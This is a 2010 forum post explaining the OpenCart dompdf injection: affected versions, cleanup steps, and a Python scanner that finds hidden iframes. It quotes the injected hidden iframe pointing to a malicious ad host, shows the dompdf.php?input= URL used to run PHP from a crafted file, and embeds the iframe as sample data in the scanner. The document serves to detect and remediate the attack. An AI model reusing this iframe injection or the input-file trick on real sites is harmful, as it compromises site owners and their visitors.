Post by Qphoria » Wed Apr 21, 2010 5:28 am

This is just a better summary of the dompdf injection script issue including what it is, what caused it, how to check for it, what it does, and how to fix it.

What Is it?
OpenCart includes a few other 3rd-party open-source classes in the core that are NOT coded by the OpenCart team. One of them is a PDF library called "dompdf" that allows PDF files to be created on the fly. This class was added a while back with plans to use it for PDF invoices, but it has not been used by the core yet. Recently, it seems that a hacker found an exploit in the dompdf code that allows it to access the OpenCart database and filesystem from within, and inject some code onto your site.

Which versions are affected?
The dompdf class was exploitable in versions 1.4.6 and earlier. 1.4.7 and later removed the dompdf class, but if you did an upgrade from an older version, be sure that you follow the removal steps just to be sure.

What does it do?
The exploit simply adds an iframe to your page which appears to be an ad script designed to show ads on your site. But it doesn't appear to be up at this time.

How to check for it? (All versions)
Checking to see if you've been injected is easy.
1. Load your store in any browser
2. Right click and choose "View Source"
3. Search the source (Ctrl+F) for "iframe"
4. If you see something like:

Code:

<iframe width=0 height=0 style=\'display:none\' src="http://adsanalytics.net/in.cgi?2"></iframe>
Then the exploit has been run on your site.

How to fix it?
Remove the exploitable File first
1. Go to your FTP and find the system/helper folder. Inside that folder is a folder called "dompdf"
2. Delete that folder
Earlier it was believed that only the dompdf.php file inside was faulty, but new information shows that there are other files in that folder that can also be used to exploit. So it is best to remove the entire folder.

Remove the injected code from your site:
The script has shown that it can inject in 2 ways:
1. In the Welcome Message on the homepage
2. In the Footer
It is best to check both places.
For the Welcome Message:
1. Go to the admin page and edit System->Settings (Use IE if FF is giving an attack warning)
2. In the welcome message editor, choose "SOURCE"
3. Search for the iframe code above and remove all instances of it
For the Footer:
1. Log into your FTP client
2. Edit: catalog/view/theme/YOURTHEME/template/common/footer.tpl
3. Search for the iframe code above and remove all instances of it
4. Save and Upload the changes

How did it happen?
The "dompdf.php" file accepts an input file as part of the URL. This file then gets turned into a PDF file.
Example:

Code:

http://www.example.com/shop/dompdf/dompdf.php?input=filename.txt
The code will process this file and make a new "filename.pdf" file.

The hacker made a custom "conf.txt" file that had PHP code inside it, and the dompdf file apparently doesn't check for code, so as it executed the file, it was executing the commands inside it. So all a hacker would need to do is run the example above on your shop manually and it would execute.

What if Google flags my page as an "Attack Site" ?
After performing the above steps to fix the issue, you can go here to follow the steps to have them review your site:
http://www.stopbadware.org/home/reviewinfo


Tags: Hacking, malware, Hacked, Attack site
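The check-and-clean-up steps above are manual (View Source, Ctrl+F for "iframe", FTP into the theme folder). The script below is an added example, not code from Qphoria's post or from OpenCart itself, that automates the same checks: it flags any iframe that is zero-sized or hidden by CSS (the shape of the injected tag quoted above), scans the theme templates under an OpenCart tree, and reports whether the system/helper/dompdf folder is still on disk. It assumes the standard OpenCart directory layout (system/helper/dompdf and catalog/view/theme/...), and the sample HTML embedded in it is constructed for the demonstration. Because the welcome message lives in the database rather than in a file, paste its "SOURCE" view (or the page source saved from your browser) into a file and point the scanner at that too.

```python
import os
import re
import sys

# Constructed sample: the injected tag quoted in the post, next to a harmless
# visible embed, so the scanner has something to tell apart. The
# backslash-escaped quotes are how the injection showed up in the
# welcome-message source.
INJECTED_SAMPLE = (
    "<p>Welcome to my store</p>\n"
    "<iframe width=0 height=0 style=\\'display:none\\' "
    "src=\"http://adsanalytics.net/in.cgi?2\"></iframe>\n"
    "<iframe width=\"560\" height=\"315\" "
    "src=\"https://www.youtube.com/embed/abc\"></iframe>\n"
)

IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.I | re.S)
# name=value with a double-quoted, single-quoted or bare value
ATTR = re.compile(r"""([A-Za-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def _attrs(raw):
    """Parse the attribute string of one tag into a lower-cased dict."""
    out = {}
    for m in ATTR.finditer(raw):
        value = next(v for v in m.groups()[1:] if v is not None)
        # drop the backslash-escaped quotes the injection leaves behind
        out[m.group(1).lower()] = value.strip("\\'\"")
    return out


def _is_zero(value):
    return value is not None and value.strip().lower().rstrip("px") == "0"


def find_hidden_iframes(html):
    """Return (src, reason) for every iframe that is zero-sized or CSS-hidden."""
    hits = []
    for m in IFRAME_TAG.finditer(html):
        a = _attrs(m.group(1))
        reasons = []
        if _is_zero(a.get("width")) or _is_zero(a.get("height")):
            reasons.append("zero size")
        if HIDDEN_CSS.search(a.get("style", "")):
            reasons.append("hidden by css")
        if reasons:
            hits.append((a.get("src", ""), ", ".join(reasons)))
    return hits


def scan_documents(docs):
    """docs: iterable of (label, text). Returns (label, src, reason) findings."""
    findings = []
    for label, text in docs:
        for src, reason in find_hidden_iframes(text):
            findings.append((label, src, reason))
    return findings


def dompdf_present(root):
    """True if the helper folder removed in 1.4.7 is still on disk."""
    return os.path.isdir(os.path.join(root, "system", "helper", "dompdf"))


def scan_install(root):
    """Read every theme template under an OpenCart tree and scan it."""
    docs = []
    theme_dir = os.path.join(root, "catalog", "view", "theme")
    for dirpath, _, files in os.walk(theme_dir):
        for name in files:
            if name.endswith((".tpl", ".php", ".html")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    docs.append((os.path.relpath(path, root), fh.read()))
    return dompdf_present(root), scan_documents(docs)


if __name__ == "__main__":
    # usage: python scan.py /path/to/opencart
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    still_there, findings = scan_install(root)
    print("system/helper/dompdf present:", still_there)
    for label, src, reason in findings:
        print(f"{label}: hidden iframe -> {src} ({reason})")
    if not findings:
        print("no hidden iframes found in theme templates")
```

The scanner looks at the raw markup rather than the rendered DOM, which is why it tolerates the escaped quotes; a visible third-party embed with a normal size is left alone, so review any hit by hand before deleting it.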
